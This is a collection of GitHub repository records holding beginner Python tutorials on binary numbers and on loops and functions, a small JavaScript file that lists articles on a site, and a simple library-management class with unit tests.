"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: August 17, 2021</figcaption>\n\n# Counting With Light Switches\n\nPeople are familiar counting with their two hands. However, how is a computer able to count using electricity?\n\nSuppose for one second that you had a single light switch. Light switches can only be in two states, either on or off. You could say, that when the light switch is off, that signifies the number 0. When it is on, it represents 1.\n\n\n\nOk, but that's pretty boring. We can't count beyond 1. Well, that's easy to fix, just add more light switches!\n\nAh, but hold on. How do we count with just two light switches? Well, we can say that if all the light switches are off, then that should definitely be 0. How do we represent one, however? Should it matter if the first or second light switch is on?\n\nLet's assume that order shouldn't matter. That means, these are all the possible quantities:\n\n\n\nWell, this is rather redundant. If the order doesn't matter, then we'll be wasting light switches, as there are two ways to represent one! And in the case of three light switches, there would be three different ways to represent one and so forth, until we get to N light switches, and there would be N ways to talk of one, as we're essentially just counting how many switches are on to count.\n\nSo, let's instead try it *with* order, as in, the number will depend on *which* switches are on:\n\n\n\nNow every combination is unique, allowing us to count up to 3. What happens if we add another light switch?\n\n\n\nWith only three light switches, we can count up to 7! With 4 light switches, we can count up to 15. Another light switch, and we can count up to 31. Do you see the pattern?\n\n## Binary\n\nFirstly, let's make it easier for ourselves. Instead of using light switches, we can use 0 or 1 for each light switch. So, 100<sub>2</sub> would be 4. You might've seen this format else where, where you count with only 0s and 1s, and that is called binary. I'll be denoting binary numbers with a subscript of 2, so that it is not confused with our regular counting numbers.\n\nSecondly, what is up with the pattern? Well, when there was only one light switch, it could've only been on, 1<sub>2</sub>, or off, 0<sub>2</sub>. That is two combinations. Adding another light switch, we have the combinations: 0<sub>2</sub>, 1<sub>2</sub>, 10<sub>2</sub>, and 11<sub>2</sub>. Those are four different combinations. Another light switch, we would have 8 combinations. This is the case because when adding a new light switch, all the previous states carry over, and then the same states could be repeated, this time with the new light switch turned on, doubling the combinations.\n\nMathematically, this could be represented as 2<sup>n</sup>, where n is the number of light switches. We can figure that with 4 light switches, we can count up to 7, as there are 8 different combinations, with 0 being one of them.\n\n## Computers\n\nIt's likely you've heard of 32-bit and 64-bit systems. You might've also been programming, and have seen 2 byte integers, as well as 4 bytes, and so forth. If you're reading the news, you might've also heard about q-bits, also known as quantum bits. We won't be talking about q-bits, as I myself do not fully understand them, and they're only used in special computations. However, most computers use this light switch system we've developed. This is because electrical components can only send, or not send, as in, they can only be on or off for a duration of time. That is how many computer circuits send information, under a type of signal called digital signal. Here's what sending a byte, which could be thought of as 8 light switches, would look like:\n\n\n\n## Python\n\nYou can also represent binary in Python. This can be done by appending `0b` next to your binary number.\n\n\t:::py\n\ttest = 0b1010\n\tprint(test) # 10\n\nNotice that Python didn't print 1010, instead it printed 10. This is because binary numbers are still numbers, and so Python will treat it as it would any regular number, regardless of how you choose to type the number. `print`, by default, prints number in the regular way, which is why it prints 10, as 1010 is equivalent to 10.\n\n## Beyond Counting\n\nHow do we know that 1010<sub>2</sub> is 10, however? We can easily count, but if we're dealing with a large number, do we really want to count?\n\nWe can start by looking at the order again. With the first switch, it can either be 1<sub>2</sub> or 0<sub>2</sub>. Then, the addition of the second switch doubles our combinations, meaning it could either be 0<sub>2</sub>, 1<sub>2</sub>, 10<sub>2</sub>, and 11<sub>2</sub>. This is nothing new, but here's what is. Since the second light switch is just the second digit, we know that when it's turned on by itself, it's equivalent to 2, since 10<sub>2</sub> = 2. What if we only turn on the third light switch? That's 100<sub>2</sub> = 4. Finally, 1000<sub>2</sub> = 8.\n\nNotice the pattern! Every digit, when turned alone, is equivalent to 2<sup>n</sup>, where n is the digit its in. Knowing this, we can break up binary numbers using simple arithmetic: 1010<sub>2</sub> = 1000<sub>2</sub> + 000<sub>2</sub> + 10<sub>2</sub> + 0<sub>2</sub>, or: 1 * 2<sup>3</sup> + 0 * 2<sup>2</sup> + 1 * 2<sup>1</sup> + 0 * 2<sup>0</sup>, which is equal to: 8 + 0 + 2 + 0 = 10.\n\nThis is what the process looks like in code:\n\n\t:::py\n\tbinary = input(\"Enter a number in binary: \")\n\n\tcounter = len(binary) - 1\n\tnumber = 0\n\tfor i in binary:\n\t\tif i == \"1\":\n\t\t\tnumber += 2**counter # The ** means exponent. So 2**4 = 2^4\n\t\tcounter -= 1\n\t\n\tprint(\"The equivalent in decimal is: \" + str(number))\n\nNotice that I called our regular counting system \"decimal.\" This is not to be confused with the decimal point. In the same way that **bi**-nary is about digits with only *two* states, 1 or 0, **deci**-mal is about digits with *ten* states, going from 0 to 9. Similarily, **hexa**-decimal is about digits with *sixteen* different states, from 0 to F. There are an infinite number of counting systems, since you could represent numbers using any number of states greater than 1.\n\nAlso, if you know your Python really well, you can convert from decimal to binary in a single line:\n\n\t:::py\n\tbinary = input(\"Enter a number in binary: \")\n\tnumber = reduce(lambda x, y: (x << 1) + (1 if y == \"1\" else 0), binary, 0)\n\tprint(\"The equivalent in decimal is: \" + str(number))\n\n## Exercise\n\nI've demonstrated how to go from binary to decimal, but what about the other way? I'll explain the technique, and then for the exercise, you can implement the program to convert from decimal to binary.\n\nGiven a decimal number, you must divide by 2, and the remainder of the division will become a binary digit. Keep dividing the number by 2 until you're left with 0. Here's how we would convert the number 18:\n\n\t18 / 2 = 9 R: 0\n\t9 / 2 = 4 R: 1\n\t4 / 2 = 2 R: 0\n\t2 / 2 = 1 R: 0\n\t1 / 2 = 0 R: 1\n\n10010<sub>2</sub> = 18\n\nGood luck on writing your program! And as always, hope you learned something new.\n\nAs always, hope you learned something new today!\n"
},
{
"alpha_fraction": 0.669735312461853,
"alphanum_fraction": 0.6962025165557861,
"avg_line_length": 37.05839538574219,
"blob_id": "493bf1b7bf8c023d8fa0fb726a42e3ab1cec9ea9",
"content_id": "13cfb1d7f97090b28da2881b2bb55e70b8757922",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5214,
"license_type": "no_license",
"max_line_length": 379,
"num_lines": 137,
"path": "/articles/intro/index4.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: June 6, 2021</figcaption>\n\n# Loops and Functions\n\nIf you've not read the previous article, I encourage you to go [back](index3.html) and read it.\n\nWe're getting close! After this article, we'll be writing Hangman! But first, we must cover loops and functions.\n\n## Loops\n\nWe've already covered lists in our previous [article](index3.html#lists). Specifically, we've covered: accessing an item in a list, finding the length of a list, adding to a list, and removing from a list. But we still don't know how we'd go about incrementing every value in a list. We could do something like this:\n\n\t:::python\n\ttest = [1, 2, 3, 4]\n\ttest[0] = test[0] + 1\n\ttest[1] = test[0] + 1\n\ttest[2] = test[0] + 1\n\ttest[3] = test[0] + 1\n\tprint(test) # [2, 3, 4, 5]\n\nHowever, this would not be practical for any large list, and it would fail if the list were to change its size. So, as we've done in the past, we introduce a new feature: For Loops.\n\nThe concept is very simple. We need a way to go through every item in the list. Here's how we do that:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tfor i in test:\n\t\tprint(i)\n\t# Output:\n\t# 12\n\t# 14\n\t# 11\n\t# 2\n\t# 4\n\nThe `i` is variable with an arbitrary name, meaning we can give it any name:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tfor hello in test:\n\t\tprint(hello)\n\t# Same output as before\n\nThe variable `i` and `hello` are like any other variable, except Python will automatically change them value to be the next value in the list after the code within the for loop is run. That is how this for loop is able to print every value in the list on a separate line.\n\nNotice though, that if we try to change the variable:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tfor num in test:\n\t\tnum = 1\n\tprint(test) # [12, 14, 2, 4]\n\nThe value of the list does *not* change. That is because `num` is a copy of each item, and not the item itself. More can be written about this later, but for now, our problem remains, how do we change the value of each item?\n\nWe already know how to change the value of one item:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\ttest[0] = 4\n\nAnd we know how to get the length of a list:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tlen(test)\n\nSo, if we can loop through a list which simply increments from 0 to the specified length, then we can change every item. Fortunately, there's a `range` function which does exactly that.\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tfor i in range(len(test)):\n\t\ttest[i] = 1\n\tprint(test) # [1, 1, 1, 1, 1]\n\nAnd if we want to increment every item then multiply it by two:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tfor i in range(len(test)):\n\t\ttest[i] += 1\n\t\ttest[i] *= 2\n\t\t# += is just a short hand for test[i] = test[i] + 1\n\t\t# Similar shorthands exist, such as -=, *=, and /=, plus a few more.\n\tprint(test) # [26, 30, 24, 6, 10]\n\n## Functions\n\nFunctions are no new concept. We've been using them since the very beginning. `print`, `input`, `int`, `str`, `len`, `range` are all functions. For this section, we'll simply learn how to define our own.\n\nTo do this, we use the `def` keyword, followed by the name of the function, then the parameters, which could be empty, then the code itself. Here's an example:\n\n\t:::python\n\tdef my_len(xs):\n\t\tcounter = 0\n\t\tfor i in xs:\n\t\t\tcounter += 1\n\t\treturn counter\n\nThis function, called `my_len`, takes a list, which it refers to as `xs`, and counts for every item in the list. Effectively, we've recreated the `len` function. To use this function:\n\n\t:::python\n\tdef my_len(xs):\n\t\tcounter = 0\n\t\tfor i in xs:\n\t\t\tcounter += 1\n\t\treturn counter\n\n\tprint(my_len([-2, 1, 2, 3, 4, \"cool\"])) # 6\n\nNotice the new `return` keyword. It simply means that the function will be substituted with this return value, which in this is `counter`. So, the function call `my_len([-2, 1, 2, 3, 4, \"cool\"])`, is evaluated as `6`, and so the code is equivalent to `print(6)`.\n\n[Earlier](index1.html#input), I've said that some functions don't return a \"useful\" value, such as `print`. Here's how we define a function that doesn't return a \"useful\" value:\n\n\t:::python\n\tdef print_menu():\n\t\tprint(\"Here are your options!\")\n\t\tprint(\"A. This is option A\")\n\t\tprint(\"B. This is option B\")\n\t\tprint(\"C. This is option C\")\n<figcaption markdown=\"span\">Notice the empty paranthesis after `test`. This means the function takes no arguments.</figcaption>\n\nAs you can see, there is no explicit return value. However, by default, this function will return the special `None` value, as you can see:\n\n\t:::python\n\tval = print_menu()\n\tprint(val) # None\n\nThe `None` value is of its own type, which carries no significant data. It's most often used as just a temporary placeholder for a variable, or in this case, for functions which do not return anything significant. There are more useful cases for it. For instance, a search function may return the first item which matches a criteria, or it may return None if no such item exists.\n\n## Exercise\nWrite a function which given a word and a list of letters, it will return the subset of letters which are in the word.\n\nWhen you're ready, you can read start reading the [next](index5.html) article.\n"
},
{
"alpha_fraction": 0.67912358045578,
"alphanum_fraction": 0.6993550658226013,
"avg_line_length": 116.91666412353516,
"blob_id": "d1b48ccd620b4f382b1dfdd5fd7fbd8b2b2b7110",
"content_id": "a5679179735d0a2aed5235104605133bbcadc741",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 11321,
"license_type": "no_license",
"max_line_length": 764,
"num_lines": 96,
"path": "/articles/binary/index.html",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html>\n<head><meta charset='utf-8'>\n<meta http-equiv='X-UA-Compatible' content='IE=edge'>\n<title>LSC CS</title>\n<meta name='viewport' content='width=device-width, initial-scale=1'>\n<meta content=\"Counting With Light Switches\" property=\"og:title\">\n<meta content=\"People are familiar counting with their two hands. However, how is a computer able to count using electricity?\" property=\"og:description\">\n<meta content=\"http://cyfaircs.github.io/articles/binary/index.html\" property=\"og:url\">\n<meta content=\"http://cyfaircs.github.io/articles/binary/cover.png\" property=\"og:image\">\n<meta content=\"#32CCFF\" property=\"theme-color\">\n<link href=\"https://fonts.googleapis.com/css?family=Open+Sans\" rel=\"stylesheet\">\n<link rel=\"stylesheet\" type=\"text/css\" href=\"../../base.css\">\n<link rel=\"stylesheet\" media=\"screen\" type=\"text/css\" href=\"../monokai.css\">\n<link rel=\"stylesheet\" media=\"print\" type=\"text/css\" href=\"../friendly.css\">\n<link rel='stylesheet' type='text/css' href='../article.css'>\n</head>\n<body>\n<header>\n<a class=\"underline\" href=\"../../index.html\">←</a>\n</header>\n\n<article>\n<p><img alt=\"\" src=\"cover.png\"></p>\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: August 17, 2021</figcaption>\n\n<h1 id=\"counting-with-light-switches\">Counting With Light Switches</h1>\n<p>People are familiar counting with their two hands. However, how is a computer able to count using electricity?</p>\n<p>Suppose for one second that you had a single light switch. Light switches can only be in two states, either on or off. You could say, that when the light switch is off, that signifies the number 0. When it is on, it represents 1.</p>\n<p><img alt=\"\" src=\"first.png\"></p>\n<p>Ok, but that's pretty boring. We can't count beyond 1. Well, that's easy to fix, just add more light switches!</p>\n<p>Ah, but hold on. How do we count with just two light switches? Well, we can say that if all the light switches are off, then that should definitely be 0. How do we represent one, however? Should it matter if the first or second light switch is on?</p>\n<p>Let's assume that order shouldn't matter. That means, these are all the possible quantities:</p>\n<p><img alt=\"\" src=\"second.png\"></p>\n<p>Well, this is rather redundant. If the order doesn't matter, then we'll be wasting light switches, as there are two ways to represent one! And in the case of three light switches, there would be three different ways to represent one and so forth, until we get to N light switches, and there would be N ways to talk of one, as we're essentially just counting how many switches are on to count.</p>\n<p>So, let's instead try it <em>with</em> order, as in, the number will depend on <em>which</em> switches are on:</p>\n<p><img alt=\"\" src=\"third.png\"></p>\n<p>Now every combination is unique, allowing us to count up to 3. What happens if we add another light switch?</p>\n<p><img alt=\"\" src=\"fourth.png\"></p>\n<p>With only three light switches, we can count up to 7! With 4 light switches, we can count up to 15. Another light switch, and we can count up to 31. Do you see the pattern?</p>\n<h2 id=\"binary\">Binary</h2>\n<p>Firstly, let's make it easier for ourselves. Instead of using light switches, we can use 0 or 1 for each light switch. So, 100<sub>2</sub> would be 4. You might've seen this format else where, where you count with only 0s and 1s, and that is called binary. I'll be denoting binary numbers with a subscript of 2, so that it is not confused with our regular counting numbers.</p>\n<p>Secondly, what is up with the pattern? Well, when there was only one light switch, it could've only been on, 1<sub>2</sub>, or off, 0<sub>2</sub>. That is two combinations. Adding another light switch, we have the combinations: 0<sub>2</sub>, 1<sub>2</sub>, 10<sub>2</sub>, and 11<sub>2</sub>. Those are four different combinations. Another light switch, we would have 8 combinations. This is the case because when adding a new light switch, all the previous states carry over, and then the same states could be repeated, this time with the new light switch turned on, doubling the combinations.</p>\n<p>Mathematically, this could be represented as 2<sup>n</sup>, where n is the number of light switches. We can figure that with 4 light switches, we can count up to 7, as there are 8 different combinations, with 0 being one of them.</p>\n<h2 id=\"computers\">Computers</h2>\n<p>It's likely you've heard of 32-bit and 64-bit systems. You might've also been programming, and have seen 2 byte integers, as well as 4 bytes, and so forth. If you're reading the news, you might've also heard about q-bits, also known as quantum bits. We won't be talking about q-bits, as I myself do not fully understand them, and they're only used in special computations. However, most computers use this light switch system we've developed. This is because electrical components can only send, or not send, as in, they can only be on or off for a duration of time. That is how many computer circuits send information, under a type of signal called digital signal. Here's what sending a byte, which could be thought of as 8 light switches, would look like:</p>\n<p><img alt=\"\" src=\"fifth.png\"></p>\n<h2 id=\"python\">Python</h2>\n<p>You can also represent binary in Python. This can be done by appending <code>0b</code> next to your binary number.</p>\n<div class=\"codehilite\"><pre><span></span><code><span class=\"n\">test</span> <span class=\"o\">=</span> <span class=\"mb\">0b1010</span>\n<span class=\"nb\">print</span><span class=\"p\">(</span><span class=\"n\">test</span><span class=\"p\">)</span> <span class=\"c1\"># 10</span>\n</code></pre></div>\n\n<p>Notice that Python didn't print 1010, instead it printed 10. This is because binary numbers are still numbers, and so Python will treat it as it would any regular number, regardless of how you choose to type the number. <code>print</code>, by default, prints number in the regular way, which is why it prints 10, as 1010 is equivalent to 10.</p>\n<h2 id=\"beyond-counting\">Beyond Counting</h2>\n<p>How do we know that 1010<sub>2</sub> is 10, however? We can easily count, but if we're dealing with a large number, do we really want to count?</p>\n<p>We can start by looking at the order again. With the first switch, it can either be 1<sub>2</sub> or 0<sub>2</sub>. Then, the addition of the second switch doubles our combinations, meaning it could either be 0<sub>2</sub>, 1<sub>2</sub>, 10<sub>2</sub>, and 11<sub>2</sub>. This is nothing new, but here's what is. Since the second light switch is just the second digit, we know that when it's turned on by itself, it's equivalent to 2, since 10<sub>2</sub> = 2. What if we only turn on the third light switch? That's 100<sub>2</sub> = 4. Finally, 1000<sub>2</sub> = 8.</p>\n<p>Notice the pattern! Every digit, when turned alone, is equivalent to 2<sup>n</sup>, where n is the digit its in. Knowing this, we can break up binary numbers using simple arithmetic: 1010<sub>2</sub> = 1000<sub>2</sub> + 000<sub>2</sub> + 10<sub>2</sub> + 0<sub>2</sub>, or: 1 * 2<sup>3</sup> + 0 * 2<sup>2</sup> + 1 * 2<sup>1</sup> + 0 * 2<sup>0</sup>, which is equal to: 8 + 0 + 2 + 0 = 10.</p>\n<p>This is what the process looks like in code:</p>\n<div class=\"codehilite\"><pre><span></span><code><span class=\"n\">binary</span> <span class=\"o\">=</span> <span class=\"nb\">input</span><span class=\"p\">(</span><span class=\"s2\">"Enter a number in binary: "</span><span class=\"p\">)</span>\n\n<span class=\"n\">counter</span> <span class=\"o\">=</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">binary</span><span class=\"p\">)</span> <span class=\"o\">-</span> <span class=\"mi\">1</span>\n<span class=\"n\">number</span> <span class=\"o\">=</span> <span class=\"mi\">0</span>\n<span class=\"k\">for</span> <span class=\"n\">i</span> <span class=\"ow\">in</span> <span class=\"n\">binary</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"n\">i</span> <span class=\"o\">==</span> <span class=\"s2\">"1"</span><span class=\"p\">:</span>\n <span class=\"n\">number</span> <span class=\"o\">+=</span> <span class=\"mi\">2</span><span class=\"o\">**</span><span class=\"n\">counter</span> <span class=\"c1\"># The ** means exponent. So 2**4 = 2^4</span>\n <span class=\"n\">counter</span> <span class=\"o\">-=</span> <span class=\"mi\">1</span>\n\n<span class=\"nb\">print</span><span class=\"p\">(</span><span class=\"s2\">"The equivalent in decimal is: "</span> <span class=\"o\">+</span> <span class=\"nb\">str</span><span class=\"p\">(</span><span class=\"n\">number</span><span class=\"p\">))</span>\n</code></pre></div>\n\n<p>Notice that I called our regular counting system \"decimal.\" This is not to be confused with the decimal point. In the same way that <strong>bi</strong>-nary is about digits with only <em>two</em> states, 1 or 0, <strong>deci</strong>-mal is about digits with <em>ten</em> states, going from 0 to 9. Similarily, <strong>hexa</strong>-decimal is about digits with <em>sixteen</em> different states, from 0 to F. There are an infinite number of counting systems, since you could represent numbers using any number of states greater than 1.</p>\n<p>Also, if you know your Python really well, you can convert from decimal to binary in a single line:</p>\n<div class=\"codehilite\"><pre><span></span><code><span class=\"n\">binary</span> <span class=\"o\">=</span> <span class=\"nb\">input</span><span class=\"p\">(</span><span class=\"s2\">"Enter a number in binary: "</span><span class=\"p\">)</span>\n<span class=\"n\">number</span> <span class=\"o\">=</span> <span class=\"n\">reduce</span><span class=\"p\">(</span><span class=\"k\">lambda</span> <span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">y</span><span class=\"p\">:</span> <span class=\"p\">(</span><span class=\"n\">x</span> <span class=\"o\"><<</span> <span class=\"mi\">1</span><span class=\"p\">)</span> <span class=\"o\">+</span> <span class=\"p\">(</span><span class=\"mi\">1</span> <span class=\"k\">if</span> <span class=\"n\">y</span> <span class=\"o\">==</span> <span class=\"s2\">"1"</span> <span class=\"k\">else</span> <span class=\"mi\">0</span><span class=\"p\">),</span> <span class=\"n\">binary</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">)</span>\n<span class=\"nb\">print</span><span class=\"p\">(</span><span class=\"s2\">"The equivalent in decimal is: "</span> <span class=\"o\">+</span> <span class=\"nb\">str</span><span class=\"p\">(</span><span class=\"n\">number</span><span class=\"p\">))</span>\n</code></pre></div>\n\n<h2 id=\"exercise\">Exercise</h2>\n<p>I've demonstrated how to go from binary to decimal, but what about the other way? I'll explain the technique, and then for the exercise, you can implement the program to convert from decimal to binary.</p>\n<p>Given a decimal number, you must divide by 2, and the remainder of the division will become a binary digit. Keep dividing the number by 2 until you're left with 0. Here's how we would convert the number 18:</p>\n<div class=\"codehilite\"><pre><span></span><code>18 / 2 = 9 R: 0\n9 / 2 = 4 R: 1\n4 / 2 = 2 R: 0\n2 / 2 = 1 R: 0\n1 / 2 = 0 R: 1\n</code></pre></div>\n\n<p>10010<sub>2</sub> = 18</p>\n<p>Good luck on writing your program! And as always, hope you learned something new.</p>\n<p>As always, hope you learned something new today!</p>\n</article>\n</body>\n</html>"
},
{
"alpha_fraction": 0.6587677597999573,
"alphanum_fraction": 0.661927342414856,
"avg_line_length": 31.461538314819336,
"blob_id": "d8f9c3870a4c35233ff378dd17d9d2c07b1cd039",
"content_id": "d686208b18f2b12a77d84e5595c44164fd5764f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1266,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 39,
"path": "/index.js",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "// Global variables are defined in data.js\n\ninit();\n\nfunction init() // Initializes the site by loading everything neccessary\n{\n\tloadProjects(projects);\n}\n\nfunction loadProjects(parent) // Loads projects from Projects and displays them according to the category\n{\n\tparent.innerHTML = \"\";\n\tvar sorted_articles = []\n\tfor (var article in Articles)\n\t\tsorted_articles.push(Articles[article])\n\tsorted_articles.sort((a, b) => {\n\t\tlet a_val = (new Date(a[\"Date\"])).valueOf();\n\t\tlet b_val = (new Date(b[\"Date\"])).valueOf();\n\t\treturn b_val - a_val;\n\t});\n\tconsole.log(sorted_articles);\n\tfor (var article in sorted_articles)\n\t\taddProject(sorted_articles[article], parent);\n}\n\nfunction addProject(project, parent) // Adds a project and displays\n{\n\tvar html = generateHTML(project.Name, project.Description, project.Link, project.Date);\n\tparent.innerHTML += html;\n}\n\nfunction generateHTML(name, description, link, date) // Generates the HTML of a project\n{\n\tvar header = '<div><a href=\"' + link + '/index.html\"><img src=\"' + link + '/cover.png' + '\"></a>';\n\tvar h1 = '<h1><a class=\"underline\" href=\"' + link + '/index.html\">' + name + '</a></h1>';\n\tvar date = \"<i>Last updated: \" + date + \"</i>\"\n\tvar p = \"<p>\" + description + \"</p>\";\n\treturn header + h1 + date + p + \"</div>\";\n}\n"
}
] | 14 |
alexNgari/Library_class_lab
|
https://github.com/alexNgari/Library_class_lab
|
c856b056cc4b40c59d315445456549fce76d4494
|
7eddabeec5e6a124d5fd50660abfa36715462c9c
|
a731dc8de034bf01686a48a75cec166e2490e19d
|
refs/heads/master
| 2020-04-08T01:03:56.834953 | 2018-11-23T21:38:13 | 2018-11-23T21:38:13 | 158,879,741 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8303571343421936,
"alphanum_fraction": 0.8303571343421936,
"avg_line_length": 112,
"blob_id": "f047565e4c570abfc9fca2c4a4922156dee58b0e",
"content_id": "b796cb41e2cd0209f2b7ea4791e9c0cdafd09801",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 1,
"path": "/README.MD",
"repo_name": "alexNgari/Library_class_lab",
"src_encoding": "UTF-8",
"text": "This is a simple library management system, created with the aim of introducing self to Test Driven Development."
},
{
"alpha_fraction": 0.5955755114555359,
"alphanum_fraction": 0.6028344035148621,
"avg_line_length": 31.51685333251953,
"blob_id": "0d012e554a351f75a3db20f003fe5a6f610c5398",
"content_id": "b984acc74dde4ef6c833e3def71a66bf03de3da8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2893,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 89,
"path": "/books.py",
"repo_name": "alexNgari/Library_class_lab",
"src_encoding": "UTF-8",
"text": "class Book:\n def __init__(self, bookNumber, title, author, price = 0, numberOfCopies = 0): # initialise book\n self.bookNumber = bookNumber\n self.title = title\n self.author = author\n self.price = price\n self.numberOfCopies = numberOfCopies\n\n\n def setPrice(self, price):\n self.price = price\n\n\n def setNumberOfCopies(self, numberOfCopies):\n self.numberOfCopies = numberOfCopies\n\n\nclass Library:\n def __init__(self): # initialise library\n self.bookNumbers = []\n self.mapOfBooks = []\n\n\n def findBook(self, title):\n result = []\n for book in self.mapOfBooks:\n if book.title == title:\n result.append({'title': book.title, 'book number': book.bookNumber})\n return result\n\n\n def insertNewBook(self, book): # insert a new book entry into the library\n if book.bookNumber in self.bookNumbers:\n raise Exception('Duplicate book numbers!')\n else:\n self.mapOfBooks.append(book)\n self.bookNumbers.append(book.bookNumber)\n \n\n def retrieveBook(self, bookNumber): # remove one copy of a book from the library\n if bookNumber in self.bookNumbers:\n position = self.bookNumbers.index(bookNumber)\n book = self.mapOfBooks[position]\n if book.numberOfCopies > 0:\n self.mapOfBooks[position].numberOfCopies -= 1\n return book\n else:\n raise ValueError('All copies of {} have been lent out.'.format(book.title))\n else:\n raise IndexError('Book does not exist!')\n\n\n def insertBook(self, bookNumber):\n if bookNumber in self.bookNumbers:\n position = self.bookNumbers.index(bookNumber)\n self.mapOfBooks[position].numberOfCopies += 1\n else:\n raise IndexError('Book does not exist!')\n\n\n def removeBook(self, bookNumber):\n if bookNumber in self.bookNumbers:\n position = self.bookNumbers.index(bookNumber)\n del self.mapOfBooks[position]\n del self.bookNumbers[position]\n else:\n raise IndexError('Book does not exist!')\n\n def listBooks(self):\n listOfBooks = []\n for book in self.mapOfBooks:\n listOfBooks.append({'Book number': book.bookNumber, 'title': book.title})\n return listOfBooks\n\n\n##################################################################################################\n#library = Library()\n#book1 = Book(1, 'The Wizard of Oz', 'Pink Panther', 20, 10)\n#library.insertNewBook(book1)\n#print(library.listBooks())\n#print(library.findBook('The Wizard of Oz'))\n#for i in range(10):\n# library.retrieveBook(1)\n#book2 = library.retrieveBook(1)\n#print(book2.numberOfCopies)\n#library.returnBook(1)\n#print(book2.numberOfCopies)\n#library.removeBook(1)\n#print(library.listBooks())"
},
{
"alpha_fraction": 0.630932629108429,
"alphanum_fraction": 0.6491868495941162,
"avg_line_length": 32.120880126953125,
"blob_id": "ec98b97488ae2829f17a89d7d2c2b7b5f57a06c7",
"content_id": "2bf99f3979d09c447bdbb0a9f3b2d8326cfdfdaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3013,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 91,
"path": "/test.py",
"repo_name": "alexNgari/Library_class_lab",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom books import Book, Library\n\nclass BookTest(unittest.TestCase):\n def setUp(self):\n self.book = Book(1, 'Title One', 'Author One', 50, 10)\n\n\n def test_isInstance_Book(self):\n self.assertIsInstance(self.book, Book, msg = 'Object should be an instance of the class Book')\n\n\n def test_object_type(self):\n self.assertTrue((type(self.book) is Book), msg= 'Object should be of type Book')\n\n \n def test_default_price(self):\n bookX = Book(10, 'Title X', 'Author X')\n self.assertEqual(0, bookX.price, msg = 'Default price should be 0')\n\n\n def test_default_number_of_copies(self):\n bookX = Book(10, 'Title X', 'Author X')\n self.assertEqual(0, bookX.numberOfCopies, msg = 'Default number of copies should be 0')\n\n\nclass LibraryTest(unittest.TestCase):\n def setUp(self):\n self.library = Library()\n self.book1 = Book(1, 'Title One', 'Author One', 50, 10)\n self.book2 = Book(2, 'Title Two', 'Author Two', 500, 5)\n self.book3 = Book(3, 'Title Three', 'Author Three', 5000, 1)\n \n self.library.insertNewBook(self.book1)\n self.library.insertNewBook(self.book2)\n self.library.insertNewBook(self.book3)\n \n \n def test_library_instance(self):\n self.assertIsInstance(self.library, Library, msg='library should be an instance of Library')\n\n \n def test_insert_new_book(self):\n self.assertListEqual([self.book1, self.book2, self.book3], self.library.mapOfBooks,\n msg = 'All the books should be in mapOfBooks in the correct order')\n\n \n def test_duplicate_entry(self):\n self.assertRaises(Exception, self.library.insertNewBook, self.book1)\n\n\n def test_retrieve_book(self):\n self.library.retrieveBook(1)\n self.assertEqual(9, self.book1.numberOfCopies, msg = 'Number of copies should reduce by one')\n\n\n def test_retrieve_spent_book(self):\n self.library.retrieveBook(3)\n self.assertRaises(ValueError, self.library.retrieveBook, 3)\n\n\n def test_retrieve_nonexistent_book(self):\n self.assertRaises(IndexError, self.library.retrieveBook, 5)\n\n\n def test_insert_book(self):\n self.library.insertBook(1)\n self.assertEqual(11, self.book1.numberOfCopies, msg='Number of copies should increase by one')\n\n\n def test_insert_nonexistent_book(self):\n self.assertRaises(IndexError, self.library.insertBook, 5)\n\n \n def test_remove_book(self):\n self.library.removeBook(1)\n self.assertListEqual([self.book2, self.book3], self.library.mapOfBooks,\n msg='Book one should be removed from the library')\n\n\n def test_remove_nonexistent_book(self):\n self.assertRaises(IndexError, self.library.removeBook, 5)\n\n \n def test_find_book(self):\n self.assertListEqual([{'title': 'Title Two', 'book number': 2}], self.library.findBook('Title Two'))\n \n\n\nif __name__ == '__main__':\n unittest.main(exit = False)"
}
] | 3 |
BStaff1986/DoPSvsML
|
https://github.com/BStaff1986/DoPSvsML
|
5f484b2661a0b793d2e3474d5e695b1e37106e91
|
977b3a7862fa49cd73db4f8659db8914d929ae4a
|
8d13fd58aa614c0b0f963bc0ec0751d8f182704f
|
refs/heads/master
| 2021-01-22T18:51:38.450327 | 2017-03-15T23:07:48 | 2017-03-15T23:07:48 | 85,129,784 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.49191907048225403,
